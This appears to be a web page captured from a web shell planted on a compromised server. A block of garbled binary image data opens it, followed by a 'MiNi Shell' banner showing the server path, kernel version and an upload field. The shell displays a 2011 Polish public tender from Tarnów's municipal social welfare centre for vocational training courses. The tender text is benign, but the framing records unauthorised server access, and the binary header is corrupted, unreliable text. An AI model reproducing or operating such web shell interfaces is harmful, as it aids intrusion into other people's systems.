JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110512/135817-N-2011.html

<p class="kh_header"><b>Tarnów: Organizacja i przeprowadzenie  w 2011 r. szkoleń,kursów realizowanych przez Miejski Ośrodek Pomocy Społecznej w Tarnowie w ramach projektu systemowego Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 135817 - 2011; data zamieszczenia: 12.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Tarnowie , Al. Matki Bożej Fatimskiej 9, 33-100 Tarnów, woj. małopolskie, tel. 014 6216079, 6276147, faks 014 6216079.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie  w 2011 r. szkoleń,kursów realizowanych przez Miejski Ośrodek Pomocy Społecznej w Tarnowie w ramach projektu systemowego Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia: 

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usług szkoleniowych  i kursów zawodowych dla 101 osób w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej, w ramach projektu pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1.

Przedmiot zamówienia obejmuje wykonanie następujących usług (V zadań):  


Zadanie nr I	
Zorganizowania i przeprowadzenie szkolenia Trening kompetencji społecznych  ( trzy grupy, 60 godzin  każda grupa - tj. łącznie 180 godzin ) - 51 osób, 

Zorganizowanie i przeprowadzenie szkolenia  Trening kompetencji społecznych dla usamodzielniających się wychowanków placówek opiekuńczo - wychowawczych i rodzin zastępczych 75 godzin) - 4 osoby, 

Zorganizowanie i przeprowadzenie doradztwa zawodowego (zajęcia w trzech grupach, 8 godzin + 2 godziny dla każdego uczestnika, tj. łącznie 128 godzin)  - 52 osoby,

Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Rodzina jako system (50 godzin +4 godzin dla każdego uczestnika, tj. łącznie 98 godzin) - 12 osób,

Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Budowanie własnego wizerunku -dwie grupy po 20 godzin, tj. 40 godzin- 33 osób, 

Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z prawnikiem z zakresu prawa pracy (dwie grupy po 20 godzin, tj. łącznie 40 godzin) -  22 osoby,
 
Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z prawnikiem z zakresu prawa rodzinnego  (20 godzin) - 3 osoby. 

Zadanie nr II	
Zorganizowanie i przeprowadzenie kursu Florysta z kasą fiskalną  (125 godzin)- 7 osób, 

Zorganizowanie i przeprowadzenie kursu Opiekun środowiskowy
(120 godzin)- 10 osób, 

 Zorganizowanie i przeprowadzenie kursu  zawodowego Opiekun środowiskowy II stopnia z modułem z zakresu udzielania pierwszej pomocy (150 godzin) - 10 osób
Zorganizowanie i przeprowadzenie kursu -Kurs fryzjerski (120 godzin) -	
5 osób,,

 Zorganizowanie i przeprowadzenie kursu zawodowego Kurs fryzjerski II stopnia z podstawami prowadzenia działalności gospodarczej  (155 godzin) - 	7 osób,, 

Zorganizowanie i przeprowadzenie kursu  zawodowego Florysta II stopnia z podstawami prowadzenia działalności  gospodarczej  (160 godzin)	- 11 osób,


Zadanie nr III	
Zorganizowanie i przeprowadzenie kursu Profesjonalny pracownik biurowy 120 godzin) - 3 osoby, 
Zorganizowanie i przeprowadzenie kursu  zawodowego  Fakturzysta z obsługą kasy fiskalnej  (43 godziny)	- 9  osób, 

Zorganizowanie i przeprowadzenie Kurs księgowości komputerowej I stopień   (70 godzin) - 5 osób, 

Zorganizowanie i przeprowadzenie Kursu biurowego z elementami  grafiki komputerowej  (60 godzin) - 1 osoba. 

Zadanie nr IV	
Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych  z mechanicznym napędem układu podnoszenia - widłowy wraz z uzyskaniem uprawnień   UDT plus uprawnienia do zmiany butli  gazowej  (67 godzin)- 14 osób, 

Zorganizowanie i przeprowadzenie kursu Magazynier  (50 godzin)	- 1 osoba, 

Zorganizowanie i przeprowadzenie Kursu spawania metodą MAG (czas trwania - zgodnie z obowiązującymi przepisami) - 5 osób, 
Zorganizowanie i przeprowadzenie kursu operator koparko - ładowarki w zakresie III klasy uprawień (czas trwanie - zgodnie z obowiązującymi przepisami) - 1 osoba, 

Zadanie nr V
Zorganizowanie i przeprowadzenie  szkoleń  przygotowujących do  egzaminu na prawo  jazdy kategorii B  (60 godzin)- 	5 osób, 

Zorganizowanie i przeprowadzenie  szkoleń  przygotowujących do egzaminu na prawo jazdy kategorii C  (50 godzin)	- 4 osoby..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.57.00.00-0, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone przez  Wykonawcę o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 pkt 1- 4  Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone przez  Wykonawcę o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 pkt 1- 4  Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadania Nr  IV C - Zorganizowanie i przeprowadzenie Kursu  spawania metodą MAG (135)  Zamawiający wymaga, aby baza szkoleniowa posiadała aktualne atesty np atest Instytutu Spawalnictwa w Gliwicach, Urzędu Dozoru Technicznego, etc., na prowadzenie kursu spawania metodą MAG. Wyposażenie bazy szkoleniowej powinno umożliwić każdemu uczestnikowi kursu przygotowanie do egzaminu kwalifikacyjnego i samodzielnej pracy w zawodzie spawacza, a ilość szkoleniowych stanowisk spawalniczych spełniała warunek: jedno stanowisko na jednego uczestnika szkolenia. 
Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone  przez  Wykonawcę o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 pkt 1- 4  Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone
 Wykonawcę, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, oraz jeżeli:  

w  zakresie zadania I pkt A): 

- Wykonawca  dysponuje odpowiednimi osobami, które będą uczestniczyć w  wykonaniu zamówienia,  poprzez wykazanie, że dysponuje lub będzie  dysponować co najmniej trzema osobami  posiadającymi dyplom ukończenia studiów psychologicznych, które przeprowadziły minimum dwa szkolenia/kursy, których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, 


w  zakresie zadania I pkt B): 

- Wykonawca dysponuje odpowiednimi osobami, które będą uczestniczyć  w  wykonaniu zamówienia,  poprzez wykazanie, że dysponuje lub będzie  dysponować: 
osobą  posiadającą dyplom ukończenia studiów psychologicznych (w przypadku modułu pierwszego i drugiego) oraz posiadającą wymagane uprawnienia do wykonywania zawodu technolog żywienia (w przypadku modułu trzeciego), które  przeprowadziły minimum dwa szkolenia/kursy, których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, 


w  zakresie zadania I pkt C): 

- Wykonawca dysponuje odpowiednimi osobami, które będą uczestniczyć  w  wykonaniu zamówienia,  poprzez wykazanie, że dysponuje lub będzie  dysponować  dwiema osobami posiadającymi wymagane uprawnienia do wykonywania zawodu: doradca zawodowy, które przeprowadziły minimum dwa szkolenia/kursy(doradztwo zawodowe), których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, 

w  zakresie zadania I pkt D) : 

- Wykonawca  dysponuje  odpowiednimi osobami, które będą uczestniczyć 
w  wykonaniu zamówienia,  poprzez wykazanie, że dysponuje lub będzie dysponować osobą posiadająca dyplom ukończenia studiów psychologicznych,  która  przeprowadziła minimum dwa szkolenia/kursy (poradnictwo specjalistyczne), których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, 




w  zakresie zadania I pkt E): 
- Wykonawca  dysponuje  odpowiednimi osobami, które będą uczestniczyć 
w  wykonaniu zamówienia,  poprzez wykazanie, że dysponuje lub będzie dysponować dwiema osobami  posiadającymi dyplom ukończenia studiów psychologicznych, które przeprowadziły minimum dwa szkolenia/kursy (poradnictwo specjalistyczne), których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, 

w  zakresie zadań  I pkt F - G ): 
- Wykonawca dysponuje odpowiednimi osobami, które będą uczestniczyć w  wykonaniu zamówienia, poprzez wykazanie, że dysponuje lub będzie dysponować osobą posiadająca dyplom ukończenia studiów prawniczych,  która przeprowadziła minimum dwa szkolenia/kursy (poradnictwo specjalistyczne), których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, 

 w zakresie zadań  II - V: 
- Wykonawca dysponuje odpowiednimi osobami, które będą uczestniczyć w wykonaniu zamówienia,  poprzez wykazanie, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia, które przeprowadziły minimum dwa szkoleniakursy, których zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone przez  Wykonawcę o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 pkt 1- 4  Prawa zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie  o spełnianiu warunków udziału w postępowaniu, o których mowa art. 22 ust. 1 Prawa zamówień publicznych,  
- pełnomocnictwo (o ile nie wynika z innych dokumentów załączonych do oferty), 
- pełnomocnictwo - w przypadku składania oferty wspólnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się zmiany postanowień zawartej umowy w stosunku do treści oferty,    na podstawie której dokonano  wyboru Wykonawcy. 

Zmiany postanowień umowy mogą nastąpić w przypadku:
1.	Wystąpienie niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, które mają wpływ na terminy i przedmiot realizacji poszczególnych etapów zamówienia, między innymi: 
1)	Zmiany w harmonogramie szkoleń (za zgodą Zamawiającego) tylko w szczególnie uzasadnionych przypadkach, pod warunkiem zachowania ostatecznego terminu realizacji umowy. 
2)	Zmiany liczby uczestników szkoleń z przyczyn niezależnych od Zamawiającego, będącego wynikiem nie podjęcia szkolenia lub przerwania uczestnictwa w szkoleniu (podjęcie pracy, choroba, nieusprawiedliwiona rezygnacja ze szkolenia itp.). W tym przypadku nastąpi zmiana wynagrodzenia Wykonawcy, biorąc pod uwagę cenę szkolenia, kursu za jedną osobę, 
3)	Kadry wykonującej przedmiot zamówienia z przyczyn losowych (np. choroba) za zgodą Zamawiającego pod warunkiem, że Wykonawca zapewni zastępstwo przez osobę lub osoby o odpowiednim przygotowaniu zawodowym, nie gorszym od przygotowania zawodowego osoby lub osób zastępowanych.
4)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy.
5)	Zaistnienia siły wyższej mającej wpływ na realizację umowy. 
2.	Nieistotnych zmian postanowień Umowy w stosunku do treści oferty, wg której dokonano wyboru Wykonawcy (np. osoby upoważnionej do kontaktów, numerów telefonów, adresów wskazanych w umowie).
3.	Warunkiem dokonania zmiany jest zawiadomienie o zaistnieniu ww. okoliczności w formie pisemnej. Zgodę na dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://portal.mops.tarnow.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Aleja Matki Bożej Fatimskiej 9, 33 - 100 Tarnów, woj. małopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2011 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w sekretariacie Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, Al. Matki Bożej Fatimskiej 9, pokój nr 20, do dnia  25  maja 2011 r. do  godz. 10:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com